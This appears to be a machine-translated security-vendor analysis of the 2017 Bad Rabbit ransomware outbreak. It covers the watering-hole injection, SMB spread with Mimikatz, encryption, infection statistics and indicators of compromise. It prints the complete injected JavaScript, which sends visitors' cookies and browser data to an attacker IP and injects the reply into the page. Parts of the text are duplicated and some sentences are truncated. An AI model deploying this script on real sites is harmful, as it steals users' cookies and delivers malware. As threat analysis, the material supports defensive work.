October 25, 2017 at 00:18Bad Rabbit: Petya is back
The attack of the Diskcoder.D (Bad Rabbit) encoder, which began on October 24, affected companies in Russia and Ukraine, including the Kiev metro. Collected in a post the first results of a malware study.
One way to spread Bad Rabbit is a drive-by download attack. Attackers compromised several popular sites by embedding JavaScript in HTML code or one of the files
Below is an improved version of the injection:
The script transmits the following information to 185.149.120 [.] 3, the connection with which seems to be missing at the moment:
Server-side logic can determine if the visitor is interesting, and then add content to the page. In this case, we watched a pop-up prompting you to download the update for Flash Player.
By clicking on the Install button, loading the executable file from
Page with payment information:
Win32 / Diskcoder.D can be distributed via SMB. Contrary to some media reports, he DOES NOT USE the EthernalBlue exploit (as Win32 / Diskcoder.C did - he is also Petya / NotPetya). Unlike its predecessor, Diskcoder.D scans the internal network for open network drives / resources. He searches for the following network balls: Mimikatz runs on the infected machine to collect credentials. A hard-coded list of logins and passwords is provided. Once a valid credential is found, the file will be uploaded to the Windows directory and executed using SCManager and .
Win32 / Diskcoder.D is a modified version of Win32 / Diskcoder.C, known from the past Petya / NotPetya epidemic. Fixed errors in file encryption. DiskCryptor , a legitimate open source software designed to encrypt logical drives, external USB drives and CD / DVD images, as well as boot system partitions, is now used for encryption. The keys are generated using
Files are encrypted with the extension
Interestingly, according to ESET telemetry data, Ukraine accounts for 12.2% of dropser component detections. Statistics below:
Statistics are largely consistent with the geographical distribution of compromised sites containing malicious JavaScript. At the same time, Ukraine suffered more than other countries (except Russia).
Note that large companies were hit at about the same time. Perhaps the cyber group had access to their network, and at the same time, it launched a watering hole attack as a decoy. Not the fact that all the victims fell for the mentioned Flash Player update. In any case, we continue to investigate the incident.
Drive-by download attack using watering hole on popular sites
One way to spread Bad Rabbit is a drive-by download attack. Attackers compromised several popular sites by embedding JavaScript in HTML code or one of the files
.js. Below is an improved version of the injection:
function e(d) {
var xhr = null;
if (!!window.XMLHttpRequest) {
xhr = new XMLHttpRequest();
} else if (!!window.ActiveXObject) {
var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];
for (var i = 0; i < xhrs.length; i++) {
try {
xhr = ActiveXObject(xhrs[i]);
break;
} catch (e) {}
}
}
if (!!xhr) {
xhr.open('POST', 'http://185.149.120\.3/scholargoogle/');
xhr.timeout = 10000;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var resp = xhr.responseText;
if (resp) {
var fans = JSON.parse(resp);
if (fans) {
var an_s = decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');
var da = document.createElement('div');
da.id = 'ans';
da.innerHTML = an_s;
document.body.appendChild(da);
}
}
}
};
var pd = [];
for (var k in d) {
if (d.hasOwnProperty(k)) {
pd.push(k + '=' + d[k]);
}
}
var dc = pd.join('&');
xhr.send(dc);
}
}
e({
'agent': navigator.userAgent,
'referer': document.referrer,
'cookie': document.cookie,
'domain': window.location.hostname,
'c_state': !!document.cookie
});
The script transmits the following information to 185.149.120 [.] 3, the connection with which seems to be missing at the moment:
- Browser user-agent
- Referrer
- Cookies from a visited site
- Domain name of visited site
Server-side logic can determine if the visitor is interesting, and then add content to the page. In this case, we watched a pop-up prompting you to download the update for Flash Player.
By clicking on the Install button, loading the executable file from
1dnscontrol[.]com. The executable install_flash_player.exeis a Win32 / Filecoder.D dropper. Then the computer will be locked, a redemption message will appear on the screen: Page with payment information:
SMB Distribution
Win32 / Diskcoder.D can be distributed via SMB. Contrary to some media reports, he DOES NOT USE the EthernalBlue exploit (as Win32 / Diskcoder.C did - he is also Petya / NotPetya). Unlike its predecessor, Diskcoder.D scans the internal network for open network drives / resources. He searches for the following network balls: Mimikatz runs on the infected machine to collect credentials. A hard-coded list of logins and passwords is provided. Once a valid credential is found, the file will be uploaded to the Windows directory and executed using SCManager and .
admin
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvcinfpub.datrundll.exeEncryption
Win32 / Diskcoder.D is a modified version of Win32 / Diskcoder.C, known from the past Petya / NotPetya epidemic. Fixed errors in file encryption. DiskCryptor , a legitimate open source software designed to encrypt logical drives, external USB drives and CD / DVD images, as well as boot system partitions, is now used for encryption. The keys are generated using
CryptGenRandomand then will be protected by a hard-coded RSA 2048 public key. Files are encrypted with the extension
.encrypted. As before, the AES-128-CBC algorithm is used.Spread
Interestingly, according to ESET telemetry data, Ukraine accounts for 12.2% of dropser component detections. Statistics below:
- Russia - 65%
- Ukraine - 12.2%
- Bulgaria - 10.2%
- Turkey - 6.4%
- Japan - 3.8%
- others - 2.4%
Statistics are largely consistent with the geographical distribution of compromised sites containing malicious JavaScript. At the same time, Ukraine suffered more than other countries (except Russia).
Note that large companies were hit at about the same time. Perhaps the cyber group had access to their network, and at the same time, it launched a watering hole attack as a decoy. Not the fact that all the victims fell for the mentioned Flash Player update. In any case, we continue to investigate the incident.
Samples
C & C Servers
Платежный сайт: http://caforssztxqzf2nm[.]onion
URL Inject: http://185.149.120[.]3/scholargoogle/
Distribution URL: hxxp://1dnscontrol[.]com/flash_install.phpList of compromised sites:
hxxp://argumentiru[.]com
hxxp://www.fontanka[.]ru
hxxp://grupovo[.]bg
hxxp://www.sinematurk[.]com
hxxp://www.aica.co[.]jp
hxxp://spbvoditel[.]ru
hxxp://argumenti[.]ru
hxxp://www.mediaport[.]ua
hxxp://blog.fontanka[.]ru
hxxp://an-crimea[.]ru
hxxp://www.t.ks[.]ua
hxxp://most-dnepr[.]info
hxxp://osvitaportal.com[.]ua
hxxp://www.otbrana[.]com
hxxp://calendar.fontanka[.]ru
hxxp://www.grupovo[.]bg
hxxp://www.pensionhotel[.]cz
hxxp://www.online812[.]ru
hxxp://www.imer[.]ro
hxxp://novayagazeta.spb[.]ru
hxxp://i24.com[.]ua
hxxp://bg.pensionhotel[.]com
hxxp://ankerch-crimea[.]ru